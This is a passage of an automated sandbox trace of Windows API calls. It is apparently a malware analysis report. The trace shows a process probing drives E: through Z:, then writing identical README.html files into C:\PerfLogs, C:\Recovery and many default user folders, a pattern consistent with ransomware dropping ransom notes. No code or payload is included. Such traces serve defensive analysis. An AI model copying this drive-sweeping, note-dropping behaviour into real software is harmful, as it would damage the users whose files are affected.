ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.798] CreateFileW (lpFileName="E:\\" (normalized: "e:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.798] FindFirstFileW (in: lpFileName="E:\\*", lpFindFileData=0x123a3a30 | out: lpFindFileData=0x123a3a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.803] CreateFileW (lpFileName="F:\\" (normalized: "f:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.805] FindFirstFileW (in: lpFileName="F:\\*", lpFindFileData=0x123a3a30 | out: lpFindFileData=0x123a3a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.810] CreateFileW (lpFileName="G:\\" (normalized: "g:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.811] SetEvent (hEvent=0x14c) returned 1 [0256.811] SetEvent (hEvent=0x12c) returned 1 [0256.811] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0256.816] SetEvent (hEvent=0x12c) returned 1 [0256.816] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0256.818] SetEvent (hEvent=0x14c) returned 1 [0256.818] SetEvent (hEvent=0x12c) returned 1 [0256.818] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0256.818] SetEvent (hEvent=0x134) returned 1 [0256.818] SetEvent (hEvent=0x12c) returned 1 [0256.818] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0256.819] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa4, ulCount=0x10, ulNumEntriesRemoved=0x19fa84, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa4, ulNumEntriesRemoved=0x19fa84) returned 0 [0256.819] SetEvent (hEvent=0x14c) returned 1 [0256.820] FindFirstFileW (in: lpFileName="G:\\*", lpFindFileData=0x123a3a30 | out: lpFindFileData=0x123a3a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.821] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x0 [0256.822] SetEvent (hEvent=0x14c) returned 1 [0256.822] SetEvent (hEvent=0x12c) returned 1 [0256.822] SetEvent (hEvent=0x134) returned 1 [0256.822] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0256.823] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0256.823] SetEvent (hEvent=0x150) returned 1 [0256.823] SetEvent (hEvent=0x134) returned 1 [0256.823] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x780000 [0256.829] CreateFileW (lpFileName="H:\\" (normalized: "h:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.830] FindFirstFileW (in: lpFileName="H:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.835] CreateFileW (lpFileName="I:\\" (normalized: "i:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.836] FindFirstFileW (in: lpFileName="I:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.842] CreateFileW (lpFileName="J:\\" (normalized: "j:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.842] FindFirstFileW (in: lpFileName="J:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.849] CreateFileW (lpFileName="K:\\" (normalized: "k:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.850] FindFirstFileW (in: lpFileName="K:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.858] CreateFileW (lpFileName="L:\\" (normalized: "l:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.859] FindFirstFileW (in: lpFileName="L:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.867] CreateFileW (lpFileName="M:\\" (normalized: "m:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.868] FindFirstFileW (in: lpFileName="M:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.876] CreateFileW (lpFileName="N:\\" (normalized: "n:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.876] FindFirstFileW (in: lpFileName="N:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.884] CreateFileW (lpFileName="O:\\" (normalized: "o:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.885] FindFirstFileW (in: lpFileName="O:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.893] CreateFileW (lpFileName="P:\\" (normalized: "p:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.894] FindFirstFileW (in: lpFileName="P:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.902] CreateFileW (lpFileName="Q:\\" (normalized: "q:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.903] FindFirstFileW (in: lpFileName="Q:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.910] CreateFileW (lpFileName="R:\\" (normalized: "r:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.913] FindFirstFileW (in: lpFileName="R:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.920] CreateFileW (lpFileName="S:\\" (normalized: "s:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.921] FindFirstFileW (in: lpFileName="S:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.928] CreateFileW (lpFileName="T:\\" (normalized: "t:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.928] FindFirstFileW (in: lpFileName="T:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.935] CreateFileW (lpFileName="U:\\" (normalized: "u:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.936] FindFirstFileW (in: lpFileName="U:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.942] CreateFileW (lpFileName="V:\\" (normalized: "v:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.943] FindFirstFileW (in: lpFileName="V:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.949] CreateFileW (lpFileName="W:\\" (normalized: "w:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.951] FindFirstFileW (in: lpFileName="W:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.957] CreateFileW (lpFileName="X:\\" (normalized: "x:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.958] FindFirstFileW (in: lpFileName="X:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.965] CreateFileW (lpFileName="Y:\\" (normalized: "y:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.966] FindFirstFileW (in: lpFileName="Y:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.973] CreateFileW (lpFileName="Z:\\" (normalized: "z:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.973] FindFirstFileW (in: lpFileName="Z:\\*", lpFindFileData=0x12371a30 | out: lpFindFileData=0x12371a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.973] CreateFileW (lpFileName="C:\\\\PerfLogs\\README.html" (normalized: "c:\\perflogs\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0256.974] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0256.974] WriteFile (in: hFile=0x17c, lpBuffer=0x12626000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12626000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0256.978] CloseHandle (hObject=0x17c) returned 1 [0256.987] CreateFileW (lpFileName="C:\\\\Recovery\\README.html" (normalized: "c:\\recovery\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0256.987] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0256.987] WriteFile (in: hFile=0x17c, lpBuffer=0x12627b00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12627b00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0256.989] CloseHandle (hObject=0x17c) returned 1 [0256.989] CreateFileW (lpFileName="C:\\\\Users\\README.html" (normalized: "c:\\users\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.003] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.003] WriteFile (in: hFile=0x17c, lpBuffer=0x12628880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12628880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.004] CloseHandle (hObject=0x17c) returned 1 [0257.005] CreateFileW (lpFileName="C:\\\\Users\\Default\\README.html" (normalized: "c:\\users\\default\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.005] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.005] WriteFile (in: hFile=0x17c, lpBuffer=0x12629600*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12629600*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.006] CloseHandle (hObject=0x17c) returned 1 [0257.007] CreateFileW (lpFileName="C:\\\\Users\\Default\\Desktop\\README.html" (normalized: "c:\\users\\default\\desktop\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.008] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.008] WriteFile (in: hFile=0x17c, lpBuffer=0x1262a380*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1262a380*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.010] CloseHandle (hObject=0x17c) returned 1 [0257.010] CreateFileW (lpFileName="C:\\\\Users\\Default\\Documents\\README.html" (normalized: "c:\\users\\default\\documents\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.011] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.011] WriteFile (in: hFile=0x17c, lpBuffer=0x1262b100*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1262b100*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.013] CloseHandle (hObject=0x17c) returned 1 [0257.013] CreateFileW (lpFileName="C:\\\\Users\\Default\\Downloads\\README.html" (normalized: "c:\\users\\default\\downloads\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.014] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.014] WriteFile (in: hFile=0x17c, lpBuffer=0x12640000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12640000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.015] CloseHandle (hObject=0x17c) returned 1 [0257.015] CreateFileW (lpFileName="C:\\\\Users\\Default\\Favorites\\README.html" (normalized: "c:\\users\\default\\favorites\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.016] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.016] WriteFile (in: hFile=0x17c, lpBuffer=0x12640d80*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12640d80*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.019] CloseHandle (hObject=0x17c) returned 1 [0257.019] CreateFileW (lpFileName="C:\\\\Users\\Default\\Links\\README.html" (normalized: "c:\\users\\default\\links\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.020] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.020] WriteFile (in: hFile=0x17c, lpBuffer=0x12641b00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12641b00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.021] CloseHandle (hObject=0x17c) returned 1 [0257.022] CreateFileW (lpFileName="C:\\\\Users\\Default\\Music\\README.html" (normalized: "c:\\users\\default\\music\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.022] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.022] WriteFile (in: hFile=0x17c, lpBuffer=0x12642880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12642880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.023] CloseHandle (hObject=0x17c) returned 1 [0257.024] CreateFileW (lpFileName="C:\\\\Users\\Default\\Pictures\\README.html" (normalized: "c:\\users\\default\\pictures\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.024] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.024] WriteFile (in: hFile=0x17c, lpBuffer=0x12643600*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12643600*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.025] CloseHandle (hObject=0x17c) returned 1 [0257.026] CreateFileW (lpFileName="C:\\\\Users\\Default\\Saved Games\\README.html" (normalized: "c:\\users\\default\\saved games\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.026] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.026] WriteFile (in: hFile=0x17c, lpBuffer=0x12644380*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12644380*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.030] CloseHandle 